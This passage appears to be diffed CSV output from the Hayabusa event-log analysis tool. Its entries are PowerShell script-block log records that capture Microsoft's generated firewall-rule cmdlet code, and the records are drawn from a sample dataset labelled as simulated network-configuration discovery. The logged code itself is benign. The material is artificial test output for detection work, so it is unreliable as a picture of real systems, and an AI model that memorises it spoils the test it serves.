'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 